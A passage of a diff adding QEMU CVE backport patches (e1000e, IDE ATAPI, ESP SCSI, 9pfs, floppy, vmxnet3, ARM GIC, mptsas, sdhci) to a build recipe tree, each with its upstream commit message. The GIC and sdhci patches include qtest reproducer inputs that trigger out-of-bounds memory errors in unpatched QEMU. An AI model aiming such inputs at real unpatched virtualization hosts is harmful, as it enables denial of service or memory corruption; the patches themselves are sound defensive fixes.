4Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor
5
6While receiving packets via e1000e_write_packet_to_guest() routine,
7'desc_offset' is advanced only when RX descriptor is processed. And
8RX descriptor is not processed if it has NULL buffer address.
9This may lead to an infinite loop condition. Increament 'desc_offset'
10to process next descriptor in the ring to avoid infinite loop.
11
12Reported-by: Cheol-woo Myung <330cjfdn@gmail.com>
13Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
14Signed-off-by: Jason Wang <jasowang@redhat.com>
15
16Upstream-Status: Backport
17CVE: CVE-2020-28916
18Signed-off-by: Armin Kuster <akuster@mvista.com>
19
20---
21 hw/net/e1000e_core.c | 8 ++++----
22 1 file changed, 4 insertions(+), 4 deletions(-)
23
24diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c
25index d8b9e4b2f4..095c01ebc6 100644
26--- a/hw/net/e1000e_core.c
27+++ b/hw/net/e1000e_core.c
28@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt,
29 (const char *) &fcs_pad, e1000x_fcs_len(core->mac));
30 }
31 }
32- desc_offset += desc_size;
33- if (desc_offset >= total_size) {
34- is_last = true;
35- }
36 } else { /* as per intel docs; skip descriptors with null buf addr */
37 trace_e1000e_rx_null_descriptor();
38 }
39+ desc_offset += desc_size;
40+ if (desc_offset >= total_size) {
41+ is_last = true;
42+ }
43
44 e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL,
45 rss_info, do_ps ? ps_hdr_len : 0, &bastate.written);
46--
472.25.1
48
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
new file mode 100644
index 0000000000..1528d5c2fd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
@@ -0,0 +1,45 @@
1From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001
2From: Paolo Bonzini <pbonzini@redhat.com>
3Date: Tue, 1 Dec 2020 13:09:26 +0100
4Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range
5
6A case was reported where s->io_buffer_index can be out of range.
7The report skimped on the details but it seems to be triggered
8by s->lba == -1 on the READ/READ CD paths (e.g. by sending an
9ATAPI command with LBA = 0xFFFFFFFF). For now paper over it
10with assertions. The first one ensures that there is no overflow
11when incrementing s->io_buffer_index, the second checks for the
12buffer overrun.
13
14Note that the buffer overrun is only a read, so I am not sure
15if the assertion failure is actually less harmful than the overrun.
16
17Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
18Message-id: 20201201120926.56559-1-pbonzini@redhat.com
19Reviewed-by: Kevin Wolf <kwolf@redhat.com>
20Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
21
22Upstream-Status: Backport
23CVE: CVE-2020-29443
24Signed-off-by: Armin Kuster <akuster@mvista.com>
25
26---
27 hw/ide/atapi.c | 2 ++
28 1 file changed, 2 insertions(+)
29
30diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
31index 14a2b0bb2f..e79157863f 100644
32--- a/hw/ide/atapi.c
33+++ b/hw/ide/atapi.c
34@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s)
35 s->packet_transfer_size -= size;
36 s->elementary_transfer_size -= size;
37 s->io_buffer_index += size;
38+ assert(size <= s->io_buffer_total_len);
39+ assert(s->io_buffer_index <= s->io_buffer_total_len);
40
41 /* Some adapters process PIO data right away. In that case, we need
42 * to avoid mutual recursion between ide_transfer_start
43--
442.25.1
45
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
new file mode 100644
index 0000000000..97d32589d8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
@@ -0,0 +1,51 @@
1Backport of:
2
3From 0db895361b8a82e1114372ff9f4857abea605701 Mon Sep 17 00:00:00 2001
4From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
5Date: Wed, 7 Apr 2021 20:57:50 +0100
6Subject: [PATCH] esp: always check current_req is not NULL before use in DMA
7 callbacks
8
9After issuing a SCSI command the SCSI layer can call the SCSIBusInfo .cancel
10callback which resets both current_req and current_dev to NULL. If any data
11is left in the transfer buffer (async_len != 0) then the next TI (Transfer
12Information) command will attempt to reference the NULL pointer causing a
13segfault.
14
15Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
16Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
17Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
18Tested-by: Alexander Bulekov <alxndr@bu.edu>
19Message-Id: <20210407195801.685-2-mark.cave-ayland@ilande.co.uk>
20
21CVE: CVE-2020-35504
22Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35504.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/0db895361b8a82e1114372ff9f4857abea605701 ]
23Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
24---
25 hw/scsi/esp.c | 19 ++++++++++++++-----
26 1 file changed, 14 insertions(+), 5 deletions(-)
27
28--- a/hw/scsi/esp.c
29+++ b/hw/scsi/esp.c
30@@ -362,6 +362,11 @@ static void do_dma_pdma_cb(ESPState *s)
31 do_cmd(s, s->cmdbuf);
32 return;
33 }
34+
35+ if (!s->current_req) {
36+ return;
37+ }
38+
39 s->dma_left -= len;
40 s->async_buf += len;
41 s->async_len -= len;
42@@ -415,6 +420,9 @@ static void esp_do_dma(ESPState *s)
43 do_cmd(s, s->cmdbuf);
44 return;
45 }
46+ if (!s->current_req) {
47+ return;
48+ }
49 if (s->async_len == 0) {
50 /* Defer until data is available. */
51 return;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
new file mode 100644
index 0000000000..40c0b1e74f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
@@ -0,0 +1,45 @@
1Backport of:
2
3From 99545751734035b76bd372c4e7215bb337428d89 Mon Sep 17 00:00:00 2001
4From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
5Date: Wed, 7 Apr 2021 20:57:55 +0100
6Subject: [PATCH] esp: ensure cmdfifo is not empty and current_dev is non-NULL
7MIME-Version: 1.0
8Content-Type: text/plain; charset=utf8
9Content-Transfer-Encoding: 8bit
10
11When about to execute a SCSI command, ensure that cmdfifo is not empty and
12current_dev is non-NULL. This can happen if the guest tries to execute a TI
13(Transfer Information) command without issuing one of the select commands
14first.
15
16Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
17Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
18Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
19Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
20Tested-by: Alexander Bulekov <alxndr@bu.edu>
21Message-Id: <20210407195801.685-7-mark.cave-ayland@ilande.co.uk>
22
23CVE: CVE-2020-35505
24Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35505.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/99545751734035b76bd372c4e7215bb337428d89 ]
25Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
26Signed-off-by: Emily Vekariya <emily.vekariya@einfochips.com>
27---
28 hw/scsi/esp.c | 4 ++++
29 1 file changed, 4 insertions(+)
30
31diff --git a/hw/scsi/esp.c b/hw/scsi/esp.c
32index c7d701bf..c2a67bc8 100644
33--- a/hw/scsi/esp.c
34+++ b/hw/scsi/esp.c
35@@ -193,6 +193,10 @@ static void do_busid_cmd(ESPState *s, uint8_t *buf, uint8_t busid)
36
37 trace_esp_do_busid_cmd(busid);
38 lun = busid & 7;
39+
40+ if (!s->current_dev) {
41+ return;
42+ }
43 current_lun = scsi_device_find(&s->bus, 0, s->current_dev->id, lun);
44 s->current_req = scsi_req_new(current_lun, 0, lun, buf, s);
45 datalen = scsi_req_enqueue(s->current_req);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
new file mode 100644
index 0000000000..1b8c77f838
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
@@ -0,0 +1,81 @@
1From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001
2From: Greg Kurz <groug@kaod.org>
3Date: Thu, 14 Jan 2021 17:04:12 +0100
4Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181)
5
6Depending on the client activity, the server can be asked to open a huge
7number of file descriptors and eventually hit RLIMIT_NOFILE. This is
8currently mitigated using a reclaim logic : the server closes the file
9descriptors of idle fids, based on the assumption that it will be able
10to re-open them later. This assumption doesn't hold of course if the
11client requests the file to be unlinked. In this case, we loop on the
12entire fid list and mark all related fids as unreclaimable (the reclaim
13logic will just ignore them) and, of course, we open or re-open their
14file descriptors if needed since we're about to unlink the file.
15
16This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual
17opening of a file can cause the coroutine to yield, another client
18request could possibly add a new fid that we may want to mark as
19non-reclaimable as well. The loop is thus restarted if the re-open
20request was actually transmitted to the backend. This is achieved
21by keeping a reference on the first fid (head) before traversing
22the list.
23
24This is wrong in several ways:
25- a potential clunk request from the client could tear the first
26 fid down and cause the reference to be stale. This leads to a
27 use-after-free error that can be detected with ASAN, using a
28 custom 9p client
29- fids are added at the head of the list : restarting from the
30 previous head will always miss fids added by a some other
31 potential request
32
33All these problems could be avoided if fids were being added at the
34end of the list. This can be achieved with a QSIMPLEQ, but this is
35probably too much change for a bug fix. For now let's keep it
36simple and just restart the loop from the current head.
37
38Fixes: CVE-2021-20181
39Buglink: https://bugs.launchpad.net/qemu/+bug/1911666
40Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com>
41Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
42Reviewed-by: Stefano Stabellini <sstabellini@kernel.org>
43Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan>
44Signed-off-by: Greg Kurz <groug@kaod.org>
45
46Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305]
47CVE: CVE-2021-20181
48
49Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
50---
51 hw/9pfs/9p.c | 6 +++---
52 1 file changed, 3 insertions(+), 3 deletions(-)
53
54diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
55index 94df440fc..6026b51a1 100644
56--- a/hw/9pfs/9p.c
57+++ b/hw/9pfs/9p.c
58@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
59 {
60 int err;
61 V9fsState *s = pdu->s;
62- V9fsFidState *fidp, head_fid;
63+ V9fsFidState *fidp;
64
65- head_fid.next = s->fid_list;
66+again:
67 for (fidp = s->fid_list; fidp; fidp = fidp->next) {
68 if (fidp->path.size != path->size) {
69 continue;
70@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
71 * switched to the worker thread
72 */
73 if (err == 0) {
74- fidp = &head_fid;
75+ goto again;
76 }
77 }
78 }
79--
802.29.2
81
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
new file mode 100644
index 0000000000..e9b815740f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
@@ -0,0 +1,62 @@
1From 94608c59045791dfd35102bc59b792e96f2cfa30 Mon Sep 17 00:00:00 2001
2From: Vivek Kumbhar <vkumbhar@mvista.com>
3Date: Tue, 29 Nov 2022 15:57:13 +0530
4Subject: [PATCH] CVE-2021-20196
5
6Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/1ab95af033a419e7a64e2d58e67dd96b20af5233]
7CVE: CVE-2021-20196
8Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
9
10hw/block/fdc: Kludge missing floppy drive to fix CVE-2021-20196
11
12Guest might select another drive on the bus by setting the
13DRIVE_SEL bit of the DIGITAL OUTPUT REGISTER (DOR).
14The current controller model doesn't expect a BlockBackend
15to be NULL. A simple way to fix CVE-2021-20196 is to create
16an empty BlockBackend when it is missing. All further
17accesses will be safely handled, and the controller state
18machines keep behaving correctly.
19---
20 hw/block/fdc.c | 19 ++++++++++++++++++-
21 1 file changed, 18 insertions(+), 1 deletion(-)
22
23diff --git a/hw/block/fdc.c b/hw/block/fdc.c
24index ac5d31e8..e128e975 100644
25--- a/hw/block/fdc.c
26+++ b/hw/block/fdc.c
27@@ -58,6 +58,11 @@
28 } \
29 } while (0)
30
31+/* Anonymous BlockBackend for empty drive */
32+static BlockBackend *blk_create_empty_drive(void)
33+{
34+ return blk_new(qemu_get_aio_context(), 0, BLK_PERM_ALL);
35+}
36
37 /********************************************************/
38 /* qdev floppy bus */
39@@ -1356,7 +1361,19 @@ static FDrive *get_drv(FDCtrl *fdctrl, int unit)
40
41 static FDrive *get_cur_drv(FDCtrl *fdctrl)
42 {
43- return get_drv(fdctrl, fdctrl->cur_drv);
44+ FDrive *cur_drv = get_drv(fdctrl, fdctrl->cur_drv);
45+
46+ if (!cur_drv->blk) {
47+ /*
48+ * Kludge: empty drive line selected. Create an anonymous
49+ * BlockBackend to avoid NULL deref with various BlockBackend
50+ * API calls within this model (CVE-2021-20196).
51+ * Due to the controller QOM model limitations, we don't
52+ * attach the created to the controller device.
53+ */
54+ cur_drv->blk = blk_create_empty_drive();
55+ }
56+ return cur_drv;
57 }
58
59 /* Status A register : 0x00 (read-only) */
60--
612.25.1
62
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
new file mode 100644
index 0000000000..31440af0bd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
@@ -0,0 +1,74 @@
1From: Prasad J Pandit <pjp@fedoraproject.org>
2
3While activating device in vmxnet3_acticate_device(), it does not
4validate guest supplied configuration values against predefined
5minimum - maximum limits. This may lead to integer overflow or
6OOB access issues. Add checks to avoid it.
7
8Fixes: CVE-2021-20203
9Buglink: https://bugs.launchpad.net/qemu/+bug/1913873
10Reported-by: Gaoning Pan <pgn@zju.edu.cn>
11Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
12
13Upstream-Status: Acepted [https://lists.gnu.org/archive/html/qemu-devel/2021-01/msg07935.html]
14CVE: CVE-2021-20203
15Signed-off-by: Minjae Kim <flowergom@gmail.com>
16---
17 hw/net/vmxnet3.c | 13 +++++++++++++
18 1 file changed, 13 insertions(+)
19
20diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
21index eff299f629..4a910ca971 100644
22--- a/hw/net/vmxnet3.c
23+++ b/hw/net/vmxnet3.c
24@@ -1420,6 +1420,7 @@ static void vmxnet3_activate_device(VMXNET3State *s)
25 vmxnet3_setup_rx_filtering(s);
26 /* Cache fields from shared memory */
27 s->mtu = VMXNET3_READ_DRV_SHARED32(d, s->drv_shmem, devRead.misc.mtu);
28+ assert(VMXNET3_MIN_MTU <= s->mtu && s->mtu < VMXNET3_MAX_MTU);
29 VMW_CFPRN("MTU is %u", s->mtu);
30
31 s->max_rx_frags =
32@@ -1473,6 +1474,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
33 /* Read rings memory locations for TX queues */
34 pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.txRingBasePA);
35 size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.txRingSize);
36+ if (size > VMXNET3_TX_RING_MAX_SIZE) {
37+ size = VMXNET3_TX_RING_MAX_SIZE;
38+ }
39
40 vmxnet3_ring_init(d, &s->txq_descr[i].tx_ring, pa, size,
41 sizeof(struct Vmxnet3_TxDesc), false);
42@@ -1483,6 +1487,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
43 /* TXC ring */
44 pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.compRingBasePA);
45 size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.compRingSize);
46+ if (size > VMXNET3_TC_RING_MAX_SIZE) {
47+ size = VMXNET3_TC_RING_MAX_SIZE;
48+ }
49 vmxnet3_ring_init(d, &s->txq_descr[i].comp_ring, pa, size,
50 sizeof(struct Vmxnet3_TxCompDesc), true);
51 VMXNET3_RING_DUMP(VMW_CFPRN, "TXC", i, &s->txq_descr[i].comp_ring);
52@@ -1524,6 +1531,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
53 /* RX rings */
54 pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.rxRingBasePA[j]);
55 size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.rxRingSize[j]);
56+ if (size > VMXNET3_RX_RING_MAX_SIZE) {
57+ size = VMXNET3_RX_RING_MAX_SIZE;
58+ }
59 vmxnet3_ring_init(d, &s->rxq_descr[i].rx_ring[j], pa, size,
60 sizeof(struct Vmxnet3_RxDesc), false);
61 VMW_CFPRN("RX queue %d:%d: Base: %" PRIx64 ", Size: %d",
62@@ -1533,6 +1543,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
63 /* RXC ring */
64 pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.compRingBasePA);
65 size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.compRingSize);
66+ if (size > VMXNET3_RC_RING_MAX_SIZE) {
67+ size = VMXNET3_RC_RING_MAX_SIZE;
68+ }
69 vmxnet3_ring_init(d, &s->rxq_descr[i].comp_ring, pa, size,
70 sizeof(struct Vmxnet3_RxCompDesc), true);
71 VMW_CFPRN("RXC queue %d: Base: %" PRIx64 ", Size: %d", i, pa, size);
72--
732.29.2
74
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
new file mode 100644
index 0000000000..46c9ab4184
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20221.patch
@@ -0,0 +1,67 @@
1From edfe2eb4360cde4ed5d95bda7777edcb3510f76a Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
3Date: Sun, 31 Jan 2021 11:34:01 +0100
4Subject: [PATCH] hw/intc/arm_gic: Fix interrupt ID in GICD_SGIR register
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9Per the ARM Generic Interrupt Controller Architecture specification
10(document "ARM IHI 0048B.b (ID072613)"), the SGIINTID field is 4 bit,
11not 10:
12
13 - 4.3 Distributor register descriptions
14 - 4.3.15 Software Generated Interrupt Register, GICD_SG
15
16 - Table 4-21 GICD_SGIR bit assignments
17
18 The Interrupt ID of the SGI to forward to the specified CPU
19 interfaces. The value of this field is the Interrupt ID, in
20 the range 0-15, for example a value of 0b0011 specifies
21 Interrupt ID 3.
22
23Correct the irq mask to fix an undefined behavior (which eventually
24lead to a heap-buffer-overflow, see [Buglink]):
25
26 $ echo 'writel 0x8000f00 0xff4affb0' | qemu-system-aarch64 -M virt,accel=qtest -qtest stdio
27 [I 1612088147.116987] OPENED
28 [R +0.278293] writel 0x8000f00 0xff4affb0
29 ../hw/intc/arm_gic.c:1498:13: runtime error: index 944 out of bounds for type 'uint8_t [16][8]'
30 SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior ../hw/intc/arm_gic.c:1498:13
31
32This fixes a security issue when running with KVM on Arm with
33kernel-irqchip=off. (The default is kernel-irqchip=on, which is
34unaffected, and which is also the correct choice for performance.)
35
36Cc: qemu-stable@nongnu.org
37Fixes: CVE-2021-20221
38Fixes: 9ee6e8bb853 ("ARMv7 support.")
39Buglink: https://bugs.launchpad.net/qemu/+bug/1913916
40Buglink: https://bugs.launchpad.net/qemu/+bug/1913917
41Reported-by: Alexander Bulekov <alxndr@bu.edu>
42Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
43Message-id: 20210131103401.217160-1-f4bug@amsat.org
44Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
45Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
46
47Upstream-Status: Backport
48CVE: CVE-2021-20221
49Signed-off-by: Armin Kuster <akuster@mvista.com>
50
51---
52 hw/intc/arm_gic.c | 2 +-
53 1 file changed, 1 insertion(+), 1 deletion(-)
54
55Index: qemu-4.2.0/hw/intc/arm_gic.c
56===================================================================
57--- qemu-4.2.0.orig/hw/intc/arm_gic.c
58+++ qemu-4.2.0/hw/intc/arm_gic.c
59@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque
60 int target_cpu;
61
62 cpu = gic_get_current_cpu(s);
63- irq = value & 0x3ff;
64+ irq = value & 0xf;
65 switch ((value >> 24) & 3) {
66 case 0:
67 mask = (value >> 16) & ALL_CPU_MASK;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
new file mode 100644
index 0000000000..7175b24e99
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
@@ -0,0 +1,55 @@
1From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001
2From: Jason Wang <jasowang@redhat.com>
3Date: Wed, 24 Feb 2021 13:45:28 +0800
4Subject: [PATCH] e1000: fail early for evil descriptor
5
6During procss_tx_desc(), driver can try to chain data descriptor with
7legacy descriptor, when will lead underflow for the following
8calculation in process_tx_desc() for bytes:
9
10 if (tp->size + bytes > msh)
11 bytes = msh - tp->size;
12
13This will lead a infinite loop. So check and fail early if tp->size if
14greater or equal to msh.
15
16Reported-by: Alexander Bulekov <alxndr@bu.edu>
17Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
18Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de>
19Cc: Prasad J Pandit <ppandit@redhat.com>
20Cc: qemu-stable@nongnu.org
21Signed-off-by: Jason Wang <jasowang@redhat.com>
22
23Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8]
24CVE: CVE-2021-20257
25
26Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
27---
28 hw/net/e1000.c | 4 ++++
29 1 file changed, 4 insertions(+)
30
31diff --git a/hw/net/e1000.c b/hw/net/e1000.c
32index cf22c4f07..c3564c7ce 100644
33--- a/hw/net/e1000.c
34+++ b/hw/net/e1000.c
35@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
36 msh = tp->tso_props.hdr_len + tp->tso_props.mss;
37 do {
38 bytes = split_size;
39+ if (tp->size >= msh) {
40+ goto eop;
41+ }
42 if (tp->size + bytes > msh)
43 bytes = msh - tp->size;
44
45@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
46 tp->size += split_size;
47 }
48
49+eop:
50 if (!(txd_lower & E1000_TXD_CMD_EOP))
51 return;
52 if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) {
53--
542.29.2
55
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
new file mode 100644
index 0000000000..45b8a4f1dd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
@@ -0,0 +1,92 @@
1From 3791642c8d60029adf9b00bcb4e34d7d8a1aea4d Mon Sep 17 00:00:00 2001
2From: Michael Tokarev <mjt@tls.msk.ru>
3Date: Mon, 19 Apr 2021 15:42:47 +0200
4Subject: [PATCH] mptsas: Remove unused MPTSASState 'pending' field
5 (CVE-2021-3392)
6MIME-Version: 1.0
7Content-Type: text/plain; charset=utf8
8Content-Transfer-Encoding: 8bit
9
10While processing SCSI i/o requests in mptsas_process_scsi_io_request(),
11the Megaraid emulator appends new MPTSASRequest object 'req' to
12the 's->pending' queue. In case of an error, this same object gets
13dequeued in mptsas_free_request() only if SCSIRequest object
14'req->sreq' is initialised. This may lead to a use-after-free issue.
15
16Since s->pending is actually not used, simply remove it from
17MPTSASState.
18
19Cc: qemu-stable@nongnu.org
20Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
21Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
22Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
23Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
24Message-id: 20210419134247.1467982-1-f4bug@amsat.org
25Message-Id: <20210416102243.1293871-1-mjt@msgid.tls.msk.ru>
26Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
27Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
28BugLink: https://bugs.launchpad.net/qemu/+bug/1914236 (CVE-2021-3392)
29Fixes: e351b826112 ("hw: Add support for LSI SAS1068 (mptsas) device")
30[PMD: Reworded description, added more tags]
31Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
32Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
33Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
34
35Upstream-Status: Backport [ https://git.qemu.org/?p=qemu.git;a=commit;h=3791642c8d60029adf9b00bcb4e34d7d8a1aea4d ]
36CVE: CVE-2021-3392
37Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
38---
39 hw/scsi/mptsas.c | 6 ------
40 hw/scsi/mptsas.h | 1 -
41 2 files changed, 7 deletions(-)
42
43diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
44index 7416e78..db3219e 100644
45--- a/hw/scsi/mptsas.c
46+++ b/hw/scsi/mptsas.c
47@@ -251,13 +251,10 @@ static int mptsas_build_sgl(MPTSASState *s, MPTSASRequest *req, hwaddr addr)
48
49 static void mptsas_free_request(MPTSASRequest *req)
50 {
51- MPTSASState *s = req->dev;
52-
53 if (req->sreq != NULL) {
54 req->sreq->hba_private = NULL;
55 scsi_req_unref(req->sreq);
56 req->sreq = NULL;
57- QTAILQ_REMOVE(&s->pending, req, next);
58 }
59 qemu_sglist_destroy(&req->qsg);
60 g_free(req);
61@@ -303,7 +300,6 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
62 }
63
64 req = g_new0(MPTSASRequest, 1);
65- QTAILQ_INSERT_TAIL(&s->pending, req, next);
66 req->scsi_io = *scsi_io;
67 req->dev = s;
68
69@@ -1319,8 +1315,6 @@ static void mptsas_scsi_realize(PCIDevice *dev, Error **errp)
70
71 s->request_bh = qemu_bh_new(mptsas_fetch_requests, s);
72
73- QTAILQ_INIT(&s->pending);
74-
75 scsi_bus_new(&s->bus, sizeof(s->bus), &dev->qdev, &mptsas_scsi_info, NULL);
76 }
77
78diff --git a/hw/scsi/mptsas.h b/hw/scsi/mptsas.h
79index b85ac1a..c046497 100644
80--- a/hw/scsi/mptsas.h
81+++ b/hw/scsi/mptsas.h
82@@ -79,7 +79,6 @@ struct MPTSASState {
83 uint16_t reply_frame_size;
84
85 SCSIBus bus;
86- QTAILQ_HEAD(, MPTSASRequest) pending;
87 };
88
89 void mptsas_fix_scsi_io_endianness(MPIMsgSCSIIORequest *req);
90--
911.8.3.1
92
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
new file mode 100644
index 0000000000..d53383247e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
@@ -0,0 +1,85 @@
1From b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 Mon Sep 17 00:00:00 2001
2From: Bin Meng <bmeng.cn@gmail.com>
3Date: Wed, 3 Mar 2021 20:26:35 +0800
4Subject: [PATCH] hw/sd: sdhci: Don't transfer any data when command time out
5MIME-Version: 1.0
6Content-Type: text/plain; charset=utf8
7Content-Transfer-Encoding: 8bit
8
9At the end of sdhci_send_command(), it starts a data transfer if the
10command register indicates data is associated. But the data transfer
11should only be initiated when the command execution has succeeded.
12
13With this fix, the following reproducer:
14
15outl 0xcf8 0x80001810
16outl 0xcfc 0xe1068000
17outl 0xcf8 0x80001804
18outw 0xcfc 0x7
19write 0xe106802c 0x1 0x0f
20write 0xe1068004 0xc 0x2801d10101fffffbff28a384
21write 0xe106800c 0x1f 0x9dacbbcad9e8f7061524334251606f7e8d9cabbac9d8e7f60514233241505f
22write 0xe1068003 0x28 0x80d000251480d000252280d000253080d000253e80d000254c80d000255a80d000256880d0002576
23write 0xe1068003 0x1 0xfe
24
25cannot be reproduced with the following QEMU command line:
26
27$ qemu-system-x86_64 -nographic -M pc-q35-5.0 \
28 -device sdhci-pci,sd-spec-version=3 \
29 -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
30 -device sd-card,drive=mydrive \
31 -monitor none -serial none -qtest stdio
32
33Cc: qemu-stable@nongnu.org
34Fixes: CVE-2020-17380
35Fixes: CVE-2020-25085
36Fixes: CVE-2021-3409
37Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
38Reported-by: Alexander Bulekov <alxndr@bu.edu>
39Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
